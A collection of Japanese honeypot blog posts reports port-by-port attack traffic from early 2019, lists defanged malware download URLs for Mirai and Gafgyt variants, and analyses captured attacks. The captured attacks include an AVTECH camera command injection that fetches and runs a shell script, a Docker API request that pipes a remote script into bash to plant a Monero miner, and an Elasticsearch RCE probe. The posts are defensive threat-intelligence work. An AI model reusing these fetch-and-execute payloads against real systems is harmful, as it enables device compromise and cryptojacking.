sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeytrap簡易分析(184-1日目:2/3-2/12)

間隔が空いてしまいましたが、Honeytrapの簡易分析となります。
◾️Honeytrap簡易分析
※80ポートは除く

f:id:one-chick-sec:20190213021639p:plain

2/3および2/4に検知数が増加していますが、ポート 27214宛にRDPの不正ログインを狙った攻撃が多数検知していることが原因となっています。2/5以降は特に傾向の変化はありませんでした。

ポート27214に関する記事がないか確認しましたが、特に情報はありませんでした。

◾️宛先ポート別検知数
2/3

宛先ポート 検知数 サービス ペイロード
27214 14,611 ? Cookie: mstshash=hello
445 873 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 152 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
52869 121 Realtek SDK POST /picsdesc.xml
3389 70 RDP ...+&......Cookie: mstshash=hello..........
20000 62 SSH SSH-2.0-libssh2_1.7.0..
82 42 ? ?
27017 36 ? ?
9100 36 ? ?
55554 35 ? ?

2/4

宛先ポート 検知数 サービス ペイロード
27214 32,495 ? Cookie: mstshash=hello
445 954 SMB SMBrS@bPC NETWORK PROGRAM 1.0
3389 177 RDP ...+&......Cookie: mstshash=hello..........
52869 150 Realtek SDK POST /picsdesc.xml
1433 124 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
22222 57 SSH SSH-2.0-libssh2_1.7.0..
1001 57 ? ?
222 56 SSH SSH-2.0-libssh2_1.7.0..
3380 56 ? ?
3392 56 ? ?

2/5

宛先ポート 検知数 サービス ペイロード
445 984 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 141 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
22222 81 SSH SSH-2.0-libssh2_1.7.0..
3389 68 RDP ...+&......Cookie: mstshash=hello..........
22 57 SSH SSH-2.0-libssh2_1.7.0..
52869 47 Realtek SDK POST /picsdesc.xml
2222 35 SSH SSH-2.0-libssh2_1.7.0..
2376 34 ? ?
1434 33 ? ?
789 33 ? ?

2/6

宛先ポート 検知数 サービス ペイロード
445 1,003 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 141 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
22222 73 SSH SSH-2.0-libssh2_1.7.0..
3389 71 RDP ...+&......Cookie: mstshash=hello..........
222 56 SSH SSH-2.0-libssh2_1.7.0..
2222 55 SSH SSH-2.0-libssh2_1.7.0..
443 53 HTTPS ?
81 41 GoAhead Web Server  GET login.cgi
22 36 SSH SSH-2.0-libssh2_1.7.0..
8080 34 PROXY GET /

2/7

宛先ポート 検知数 サービス ペイロード
445 986 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 120 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
20022 111 SSH SSH-2.0-libssh2_1.7.0..
3389 88 RDP ...+&......Cookie: mstshash=hello..........
3398 80 ? ?
443 62 HTTPS ?
52869 43 Realtek SDK POST /picsdesc.xml
81 43 GoAhead Web Server  GET login.cgi
2222 42 SSH SSH-2.0-libssh2_1.7.0..
22222 42 SSH SSH-2.0-libssh2_1.7.0..

2/8

宛先ポート 検知数 サービス ペイロード
445 1,043 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 133 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 88 RDP ...+&......Cookie: mstshash=hello..........
6379 51 ? ?
52869 42 Realtek SDK POST /picsdesc.xml
18245 38 ? ?
2404 35 ? ?
443 34 HTTPS ?
81 34 GoAhead Web Server  GET login.cgi
8080 33 PROXY GET /

2/9

宛先ポート 検知数 サービス ペイロード
445 941 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 146 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 78 RDP ...+&......Cookie: mstshash=hello..........
81 41 GoAhead Web Server  GET login.cgi
52869 37 Realtek SDK POST /picsdesc.xml
25 34 SMTP ?
2087 33 ? ?
22222 31 SSH SSH-2.0-libssh2_1.7.0..
8080 30 PROXY GET /
22 29 SSH SSH-2.0-libssh2_1.7.0..

2/10

宛先ポート 検知数 サービス ペイロード
445 1,307 SMB SMBrS@bPC NETWORK PROGRAM 1.0
22 568 SSH SSH-2.0-libssh2_1.7.0..
1433 129 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 64 RDP ...+&......Cookie: mstshash=hello..........
52869 38 Realtek SDK POST /picsdesc.xml
137 33 NetBIOS Name Service ?
3780 33 ? ?
53 33 DNS ?
631 33 ? ?
7657 33 ? ?

2/11

宛先ポート 検知数 サービス ペイロード
445 1,032 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 132 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
81 68 GoAhead Web Server  GET login.cgi
52869 57 Realtek SDK POST /picsdesc.xml
3389 42 RDP ...+&......Cookie: mstshash=hello..........
443 39 HTTPS ?
6666 37 ? ?
3390 27 ? ?
222 25 SSH SSH-2.0-libssh2_1.7.0..
5555 25 Android Debug Bridge CNXN 2.......host::.OPEN.

2/12

宛先ポート 検知数 サービス ペイロード
445 1,104 SMB SMBrS@bPC NETWORK PROGRAM 1.0
3389 365 RDP ...+&......Cookie: mstshash=hello..........
1433 139 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
52869 67 Realtek SDK POST /picsdesc.xml
81 39 GoAhead Web Server  GET login.cgi
5555 36 Android Debug Bridge CNXN 2.......host::.OPEN.
3390 33 RDP &..Cookie: mstshash=hello
8080 29 PROXY GET /
4567 28 ? ?
2222 27 SSH SSH-2.0-libssh2_1.7.0..


◾️マルウェアダウンロード

宛先ポート URL malware_download_honeytrap 新規マルウェアダウンロード
88 /index.action hxxp://a46.bulehero.in/download.exe  
88 /index.do hxxp://a46.bulehero.in/download.exe  
88 /struts2-rest-showcase/orders.xhtml hxxp://a46.bulehero.in/download.exe  
91 /index.action hxxp://a46.bulehero.in/download.exe  
91 /index.do hxxp://a46.bulehero.in/download.exe  
91 /struts2-rest-showcase/orders.xhtml hxxp://a46.bulehero.in/download.exe  
7001 /wls-wsat/CoordinatorPortType11 hxxp://a46.bulehero.in/download.exe  
8000 /index.action hxxp://a46.bulehero.in/download.exe  
8000 /index.do hxxp://a46.bulehero.in/download.exe  
8000 /struts2-rest-showcase/orders.xhtml hxxp://a46.bulehero.in/download.exe  
8080 /index.action hxxp://a46.bulehero.in/download.exe  
8080 /index.do hxxp://a46.bulehero.in/download.exe  
8080 /struts2-rest-showcase/orders.xhtml hxxp://a46.bulehero.in/download.exe  
8080 /tmUnblock.cgi hxxp://185.244.25.241/bins/cock.mpsl https://www.virustotal.com/#/url/2fbd43cafcf94d79cc1b9f565f6089e43d4e7b56e5ce2a3dbaf153b1d486d2d4/detection
8080 /tmUnblock.cgi hxxp://185.101.105.182/vb/Amakano.mpsl https://www.virustotal.com/#/url/0918c3dc8cfaf876d8a3ca7cdb4af586fe08058c85e3a59cfb1064e84fd6b578/detection
8080 /tmUnblock.cgi hxxp://104.168.149.5/vb/Amakano.mpsl https://www.virustotal.com/#/file/7ccb4ace354edd5868683682181fbb0adedd463c66083e6116bb332230fc5bd1/detection
8080 /tmUnblock.cgi hxxp://80[.]211[.]114[.]27/lx/apep[.]mpsl https://www.virustotal.com/#/file/b02f3d770b7ae7097e2a29aade6c7e6e9b7adb25d8a05bf9fafaef8bb236bb3c/detection
49451 /upnp/control/hag hxxp://67.205.150.97/VPNFilter.sh https://www.virustotal.com/#/file/5577884c48ab1c2e0c12967a2b25ad52f68e1bb4cfc78642b081d54dd44259cb/detection
52869 /picsdesc.xml hxxp://80.211.8.182/Okami.mips https://www.virustotal.com/#/file/32a8b7fdae9d85b3e4b7a39c23c2547254526079649bc1020ffab45d3213684b/detection
52869 /picsdesc.xml hxxp://80.211.8.182/Okami.mips  
52869 /picsdesc.xml hxxp://80.211.75.183/mips https://www.virustotal.com/#/file/3f99461d28626eb37aa1b334b3fd58bc2be166a5938374a8053d08fed99b631f/detection
52869 /picsdesc.xml hxxp://45.62.249.171/khaos.mips https://www.virustotal.com/#/file/3f99461d28626eb37aa1b334b3fd58bc2be166a5938374a8053d08fed99b631f/detection
52869 /picsdesc.xml hxxp://185.101.107.127/Demon.mips  
52869 /picsdesc.xml hxxp://93[.]104[.]209[.]253/bins/Freya[.]mips https://www.virustotal.com/#/url/b130b9f3f3bc26d3b4e4e10b9e7a81336d230fb576508184ab558da454bf445f/detection
52869 /picsdesc.xml hxxp://185[.]101[.]107[.]127/Demon[.]mips  
55555 /tmUnblock.cgi hxxp://185.172.110.203/MG.mipsel https://www.virustotal.com/#/file/7f51624363aca7dc152a25d25bba29a6d9efa53644d60e777b0712e3478422cb/detection
55555 /tmUnblock.cgi hxxp://45[.]32[.]73[.]98/bins[.]sh https://www.virustotal.com/#/url/c72cfacbffd1dd7df7d893cd13ec0edb3b7ad382418e6f17100a92653c2a3716/detection
55555 /tmUnblock.cgi hxxp://185[.]244[.]30[.]151/Corona[.]mipsel https://www.virustotal.com/#/file/ed4cea8e9a3fecf201baae9fac4d35f09969c34a86adfe2835995a4ecaa1efe5/detection
55555 /tmUnblock.cgi hxxp://185[.]172[.]110[.]203/MG[.]mipsel https://www.virustotal.com/#/file/7f51624363aca7dc152a25d25bba29a6d9efa53644d60e777b0712e3478422cb/detection

Mirai/Gafgytの亜種を除いた場合、hxxp://a46[.]bulehero[.]in/download[.]exe のダウンロードが多い印象でした。
Any.runで調査したところ、MinerやTrojanの記載がありました。

http://a46.bulehero.in/download.exe - Interactive analysis - ANY.RUN

 

簡易分析は以上となります。

【ハニーポット月次分析】HoneyTrap 1月度〜SSHとIoT製品を狙った攻撃が増加傾向〜

遅くなってしまいましたが、1月分の集計が終わりましたので月次の分析を記載します。今回は月次集計とは別に個人的に気になった攻撃を簡単に解説しています。

 

 



1/1-1/31 Honeytrap 月次分析
※80ポートは別ハニーポットで収集しているため、対象外

1.検知数グラフ

f:id:one-chick-sec:20190209134105p:plain

1/14に検知数が増加していますが、以下のようなRDPの不正アクセスを狙った通信を多数検知していたことが原因となります。

ペイロード
...*%......Cookie: mstshash=Test..........

特定のIPからの通信でなく、複数のIPから検知していました。


2.送信元IP(国)別マップ

f:id:one-chick-sec:20190209134120p:plain


3. 宛先ポート別検知数 TOP10

宛先ポート 検知数 サービス 前月
445 33927 SMB 56831
1433 4779 ms-sql-s 4014
22 4017 SSH 1727
52869 3129 Realtek SDK 1812
3389 3020 RDP 2500
8080 1443 PROXY 1556
81 1355 GoAhead Web Server  3006
443 1032 HTTPS 729
2222 1000 SSH 298
22222 833 SSH 367


前月と比較してSSHへの不正アクセスおよびRealtek SDK脆弱性を狙ったものが大きく増加していました。
SSHについては侵入後に何かをダウンロードする挙動を行うと推測されますが、cowrieのようにエミュレートする機能はHoneytrapにないため、詳細までは調査できませんでした。SSHの接続方法は様々な方法で来ていることを確認できました。

SSHの通信内容例>
SSH-2.0-Ganymed Build_210.
SSH-2.0-JSCH-0.1.51.
SSH-2.0-OpenSSH_4.3
SSH-2.0-OpenSSH_6.7p1 Raspbian-5+deb8u1
SSH-2.0-PuTTY_Release_0.63
SSH-2.0-ZGrab ZGrab SSH Survey
SSH-2.0-libssh2_1.8.0.
SSH-2.0-libssh_0.8.2
SSH-2.0-paramiko_2.4.2

Realtek SDK を狙った脆弱性では、MiraiおよびGafgyt亜種への感染を狙ったものであり、マルウェアの種類には大きな変化はありませんでした。


4. HTTP パスごとにおける検知数

メソッド ポート パス CVE 対象 検知数
POST 443, 52869 等 /picsdesc.xml CVE-2014-8361 Realtek SDK の Miniigd サービス 3079
GET 61-9997 ///admin/config.php CVE-2006-5526 fully modded phpbb 1658
GET 81 login.cgi   GoAhead Web Server 630
GET 7901-9994  等 ///admin/assets/js/views/login.js   WordPress? 452
GET 81,82,5555,6666,
8080-8089  等
/manager/html   Tomcat 管理
マネージャ
113
POST 37215 /ctrlt/DeviceUpgrade_1 CVE-2017-17215 Huawei HG532 103
POST 8080, 55555 /tmUnblock.cgi   Linksys ルータ 67
GET 81-98,
7000-7002 等
/index.action CVE-2018-11776 Apache Struts2 66
POST 8088 /ws/v1/cluster/apps/new-application   Hadoop YARN ResourceManager 66
GET 81, 8080, 8181, 9191 /PHPMYADMIN/scripts/setup.php   phpMyAdmin 25
POST 7001 /wls-wsat/CoordinatorPortType11 CVE-2017-10271 Oracle WebLogic Server 23


IoT製品を狙った攻撃が多く見られました。他にはWordpressWeblogicphpMyadminなどの過去から検知している攻撃も継続的に検知していました。

 

5. 気になった通信


バックドアの設置を狙った通信

<通信内容>
PUT /FxCodeShell.js
※どのようなソースコードであるかはググれば出てくると思います。

<概要>
PUTコマンドで バックドアである FxCodeShell.jsp をアップロードしようとしている通信であり 攻撃が成功した場合、バックドアが設置されてしまいます。 このバックドアはファイルのアップロードや外部サイトからのダウンロード機能、設置したファイルの実行などを行う機能が あると考えられます。

<対策> PUTコマンドによる不要なファイルアップロードを制限する

<個人的な感想>
実際にGoogleでこのファイルを検索してみたところ、いくつかのサイトでも設置されているバックドアでした。 おそらく、すでに利用されていないサイトであると思いますが、実際に設置されているものなんですね。。。。。

② IoT製品を狙った攻撃


<通信内容>
GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/sh%20;%20chmod%20777%20sh;/tmp/sh;rm%20-rf%20sh)&password=admin HTTP/1.1
Host: xxx.xxx.xxx.xxx:88
User-Agent: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.1.3.el7.x86_64

<概要>
AVTECH IP Camera/NVR/DVR に存在するコマンドインジェクションの脆弱性を狙った通信となります。 攻撃が成功した場合、HTTPリクエストから任意のコードが実行されてしまう可能性があります。

<対策>
最新のファームウェアにアップデートする
※明確な情報がなかったため、バージョン情報などは明記していません。

<個人的な感想>
AVTECHは監視カメラ等を製造・販売している台湾メーカであり、MiraiなどのIoTボットネットの標的とされる傾向にあります。 普通に利用しているユーザでアップデートする人も少ないと思うので、まだまだ攻撃者のターゲットになるのではないかと思います。

<参考>
https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/


③Docker Remote API を用いたmoneroのマイナー設置を狙った攻撃


<通信内容>
POST /v1.37/containers/create HTTP/1.1
Host: xxx.xxx.xxx.xxx:2375
User-Agent: Docker-Client/18.03.1-ce (linux)
Content-Type: application/json

{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":[],"Cmd":["chroot","/mnt","/bin/sh","-c","wget -q -O - hxxps://xxxxxxx.xxx/xx/xxxxx | sed 's/\\r//g' | bash -s"],"Image":"alpine","Volumes":{},"WorkingDir":""
※省略

<概要>
Docker Remote API を用いてDockerコンテナ作成を狙った攻撃であり 今回の攻撃では monero マイナーのDockerイメージが作成されます。

<対策>
リモートでのアクセス元の制御を行う

<個人的な感想>
今回検知した攻撃は monero マイナーに関する攻撃ですが、そこまで検知数が多くないものの、まだまだ標的とされている攻撃方法だと再認識しました。


④Kguard製 DVRの脆弱性を狙った攻撃


<通信内容>
REMOTE HI_SRDK_DEV_GetHddInfo MCTP/1.0
CSeq:197
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:15

Segment-Num:0

<概要>
Kguard製 DVRの脆弱性を狙った通信であり 攻撃が成功した場合、任意のコード実行されてしまう可能性があります。

<対策>
 最新のファームウェアにアップデートする
※明確な情報がなかったため、バージョン情報などは明記していません。


<個人的な感想>
調査行為止まりの通信でこのリクエストにレスポンスがあれば、後続の攻撃を検知すると思われます。

<参考情報>
IIJ Security Diary: Hajime ボットの観測状況


⑤ Elaticsearch の脆弱性を狙った攻撃


<通信内容>
GET /_search?source={"script_fields":%20{"iswin":%20{"lang":%20"groovy",%20"script":%20"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).%
~省略~

<概要>
Elaticsearch の脆弱性を狙った攻撃であり 攻撃が成功した場合、任意のコードが実行される可能性があります。 今回、検知した攻撃はwhoamiコマンドであり、調査行為相当の通信でした。
※CVE番号は CVE-2015-1427

<対策>
Elasticsearch 1.4.3 以上にアップデートする

<個人的な感想>
調査行為相当の通信でしたが、この後コマンド成功した場合 攻撃者側がどのような挙動になるかは気になりました。

6.まとめ


SSHおよび Realtek脆弱性を狙った通信が多い傾向
・複数IPからRDPへの不正アクセスが突発的に発生
マルウェアのダウンロード先はIoT製品を狙ったMiraiおよびGafgyt亜種が多い傾向
・検知数は少ないものの、DockerやElaticsearch の脆弱性なども検知

以上となります。もうちょっと情報が取得できるように監視できる範囲を増やそうかなーと思います。

【ハニーポット簡易分析】Honeytrap簡易分析(178-183日目:1/28-2/2)

Honeytrap簡易分析(178-183日目:1/28-2/2)となります。

◾️Honeytrap簡易分析
※80ポートは除く

f:id:one-chick-sec:20190203105035p:plain

f:id:one-chick-sec:20190203105331p:plain


1/28

宛先ポート 検知数 サービス ペイロード
445 1,108 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 148 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
8080 113 PROXY GET / HTTP/1.1
3389 91 RDP ...+&......Cookie: mstshash=hello..........
22222 48 SSH SSH-2.0-libssh2_1.7.0..
81 47 GoAhead Web Server  GET login.cgi
222 37 SSH SSH-2.0-libssh2_1.7.0..
52869 34 Realtek SDK POST /picsdesc.xml
2222 33 SSH SSH-2.0-libssh2_1.7.0..
9160 33 ? ?

1/29

宛先ポート 検知数 サービス ペイロード
445 1,076 SMB SMBrS@bPC NETWORK PROGRAM 1.0
3389 270 RDP ...+&......Cookie: mstshash=hello..........
1433 134 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
8443 51 ? ?
4489 50 ? ...+&......Cookie: mstshash=hello..........
81 44 GoAhead Web Server  GET login.cgi
8080 39 PROXY GET / HTTP/1.1
3333 36 ? ?
4443 34 ? ?
587 34 ? ?

1/30

宛先ポート 検知数 サービス ペイロード
445 1,096 SMB SMBrS@bPC NETWORK PROGRAM 1.0
503 215 intrinsa ?
1433 199 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 86 RDP ...+&......Cookie: mstshash=hello..........
102 73 ? ?
123 65 ? ?
2082 37 ? ?
11211 35 ? ?
22222 34 SSH SSH-2.0-libssh2_1.7.0..
49 34 ? ?

1/31

宛先ポート 検知数 サービス ペイロード
445 1,067 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 145 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 91 RDP ...+&......Cookie: mstshash=hello..........
50075 60 ? ?
8080 52 PROXY GET / HTTP/1.1
4592 34 ? ?
3386 33 ? ?
4991 33 ? ?
8098 33 ? ?
34567 32 ? ?

2/1

宛先ポート 検知数 サービス ペイロード
445 1,139 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 274 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 93 RDP ...+&......Cookie: mstshash=hello..........
44818 63 ? ?
52869 38 Realtek SDK POST /picsdesc.xml
81 38 GoAhead Web Server  GET login.cgi
110 33 ? ?
5222 33 ? ?
14000 30 ? ?
50050 30 ? ?

2/2

宛先ポート 検知数 サービス ペイロード
445 2,462 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 271 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
40035 187 ? Cookie: mstshash=hello..........
3389 92 RDP ...+&......Cookie: mstshash=hello..........
52869 72 Realtek SDK POST /picsdesc.xml
2086 36 ? ?
3000 34 ? ?
81 34 GoAhead Web Server  GET login.cgi
8140 34 ? ?
853 34 ? ?

SSH関連は減少してきましたが、SMB 、Microsoft SQL ServerRealtek SDK はいずれも検知数の上位となっていました。
他には調査行為(おそらくスキャンと思われる)通信の検知となっていました。

<新規マルウェアダウンロード>

ポート マルウェアダウンロード先 VT
5555 hxxp://137[.]74[.]237[.]194/adb4
→ダウンロード先はスクリプトであり、以下のファイルを
 ダウンロードさせる
  hxxp://137[.]74[.]237[.]194/fbot[.]arm7

VirusTotal

52869 hxxp://163[.]172[.]186[.]209/bins/mips[.]death

VirusTotal

52869 hxxp://45[.]62[.]249[.]171/d/xd[.]mips VirusTotal
52869 hxxp://80[.]211[.]4[.]5/Axe

VirusTotal

52869 hxxp://80[.]211[.]8[.]182/Okami[.]mips

VirusTotal

Realtek SDK に関する脆弱性を狙った通信でいくつか新規のマルウェアを検知していました。マルウェアとしては、MiraiおよびGafgytの亜種を狙ったものでした。


1月分の集計も終わったので、まとめ記事を書く予定です。

以上となります。

【ハニーポット簡易分析】Honeytrap簡易分析(176-177日目:1/26-1/27)

SMB、Microsoft SQL Server 、RDPなど普段と変わらない検知でした。


◾️Honeytrap簡易分析(176-177日目:1/26-1/27)
※80ポートを除く

f:id:one-chick-sec:20190128233603p:plain

 

f:id:one-chick-sec:20190128233517p:plain

<宛先ポート別検知数>
1/26

宛先ポート 検知数 サービス ペイロード
445 889 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 155 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 84 RDP ...+&......Cookie: mstshash=hello..........
52869 81 Realtek SDK POST /picsdesc.xml
2022 64 SSH SSH-2.0-libssh2_1.7.0..
81 50 GoAhead Web Server  GET login.cgi
6379 47 ? *1..$4..info..
389 33 LDAP ?
5006 33 ? ?
5601 33 ? ?

1/27

宛先ポート 検知数 サービス ペイロード
445 924 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 148 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 79 RDP ...+&......Cookie: mstshash=hello..........
52869 67 Realtek SDK POST /picsdesc.xml
10001 64 ? ?
8000 43 iRDMI  
81 38 GoAhead Web Server  GET login.cgi
25 34 SMTP ?
8069 33 ? ?
8086 31 ? ?


<新規マルウェアダウンロード>

ポート マルウェアダウンロード先 VT
5555 hxxp://159[.]89[.]182[.]124/z[.]sh VirusTotal

対象のファイルがどのようなものを実行しようとしているのか調査を試みましたが、404でアクセスが出来ずにどのようなマルウェアを実行しようとしているか不明でした。

以上となります。

【ハニーポット簡易分析】Honeytrap簡易分析(172-175日目:1/22-1/25)

Honeytrap簡易分析(172-175日目:1/22-1/25)となります。

※80ポートを除く

f:id:one-chick-sec:20190126225251p:plain

 

f:id:one-chick-sec:20190126225316p:plain

<宛先ポート別検知数>
1/22

宛先ポート 検知数 サービス ペイロード
445 1,123 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 152 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
52869 109 Realtek SDK POST /picsdesc.xml
3389 103 RDP ...+&......Cookie: mstshash=hello..........
22222 55 SSH SSH-2.0-libssh2_1.7.0..
2222 47 SSH SSH-2.0-libssh2_1.7.0..
222 43 SSH SSH-2.0-libssh2_1.7.0..
8080 36 PROXY GET / HTTP/1.1
81 35 GoAhead Web Server  GET login.cgi
8443 34 ? ?


1/23

宛先ポート 検知数 サービス ペイロード
445 1,069 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 169 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 74 RDP ...+&......Cookie: mstshash=hello..........
52869 69 Realtek SDK POST /picsdesc.xml
222 55 SSH SSH-2.0-libssh2_1.7.0..
22222 45 SSH SSH-2.0-libssh2_1.7.0..
2222 43 SSH SSH-2.0-libssh2_1.7.0..
81 39 GoAhead Web Server  GET login.cgi
49152 33 ? ?
7547 33 ? ?


1/24

宛先ポート 検知数 サービス ペイロード
445 1,168 SMB SMBrS@bPC NETWORK PROGRAM 1.0
22 350 SSH SSH-2.0-libssh2_1.7.0..
1433 147 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 100 RDP ...+&......Cookie: mstshash=hello..........
52869 84 Realtek SDK POST /picsdesc.xml
502 67 ? ?
4040 62 ? ?
8080 53 PROXY GET / HTTP/1.1
2222 38 SSH SSH-2.0-libssh2_1.7.0..
22222 35 SSH SSH-2.0-libssh2_1.7.0..


1/25

宛先ポート 検知数 サービス ペイロード
445 1,093 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 147 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
52869 89 Realtek SDK POST /picsdesc.xml
1911 64 ?  ?
3389 59 RDP ...+&......Cookie: mstshash=hello..........
8080 51 PROXY GET / HTTP/1.1
222 50 SSH SSH-2.0-libssh2_1.7.0..
81 36 GoAhead Web Server  GET login.cgi
5222 36 SSH SSH-2.0-libssh2_1.7.0..
53 33 DNS ?


特に新規性のある通信はありませんでした。

<新規マルウェアダウンロード>
新規マルウェアのダウンロードを狙った攻撃はありませんでした。

なかなか新規の検知がないので、少し監視すべき領域を広げようと検討中です。

以上となります。

【ハニーポット簡易分析】Honeytrap簡易分析(170-171日目:1/20-1/21)

Honeytrap簡易分析(170-171日目:1/20 -1/21)です。

◾️Honeytrap簡易分析
※80ポートは除く

f:id:one-chick-sec:20190122235525p:plain

f:id:one-chick-sec:20190122235538p:plain




 <宛先ポート別検知数>
1/20

宛先ポート 検知数 サービス ペイロード
445 899 SMB SMBrS@bPC NETWORK PROGRAM 1.0
22 668 SSH SSH-2.0-libssh2_1.7.0..
1433 160 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 74 RDP ...+&......Cookie: mstshash=hello..........
8822 64 SSH SSH-2.0-libssh2_1.7.0..
52869 57 Realtek SDK POST /picsdesc.xml
443 50 HTTPS ?
2222 44 SSH SSH-2.0-libssh2_1.7.0..
3128 39 ? ?
5985 39 ? ?

1/21

宛先ポート 検知数 サービス ペイロード
445 1,027 SMB SMBrS@bPC NETWORK PROGRAM 1.0
1433 151 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
2022 128 SSH SSH-2.0-libssh2_1.7.0..
3389 108 RDP ...+&......Cookie: mstshash=hello..........
2222 91 SSH SSH-2.0-libssh2_1.7.0..
22222 90 SSH SSH-2.0-libssh2_1.7.0..
222 85 SSH SSH-2.0-libssh2_1.7.0..
8822 64 SSH SSH-2.0-libssh2_1.7.0..
9600 63 ? ?
443 52 HTTPS ?


SSH通信の検知が多い傾向でした。送信元IPについても調査しましたが、特定のIPではなく複数のIPからの通信を検知していました。

<新規マルウェア検知>
検知なし

既存ものですが、以下のマルウェアを検知してました。
・gemini.mips, Demon.mips, sunless.mips

以上となります。

【ハニーポット簡易分析】Honeytrap簡易分析(169日目:1/19)

Honeytrap簡易分析(169日目:1/19)となります。
◾️Honeytrap簡易分析(169日目:1/19)
※80ポートは除く

f:id:one-chick-sec:20190120175756p:plain

 

f:id:one-chick-sec:20190120175809p:plain

 

宛先ポート 検知数 サービス ペイロード
445 1005 SMB SMBrS@bPC NETWORK PROGRAM 1.0
37777 246 DVRで利用 ...`.......H.V..................
1433 159 Microsoft SQL Server S.E.R.V.E.R.s.a.O.S.Q.L
3389 112 RDP ...+&......Cookie: mstshash=hello..........
443 64 HTTPS ?
52869 54 Realtek SDK POST /picsdesc.xml
2222 44 SSH SSH-2.0-libssh2_1.7.0..
8080 44 PROXY GET / HTTP/1.1
9000 41 ? ?
222 37 SSH SSH-2.0-libssh2_1.7.0..

ポート 37777 宛てへの通信が増加していました。過去の事例ではMirai亜種のアクセスとして報告されており。海外製デジタルビデオレコーダ等を標的としたアクセスであり、ボットに感染した端末から不正アクセスを狙ったものと推測されます。
ペイロード内容例>
...`.......H.V..................

https://www.npa.go.jp/cyberpolice/detect/pdf/20170120.pdf



<新規マルウェアダウンロード>
特に新規マルウェアの検知はありませんでした。

以上となります。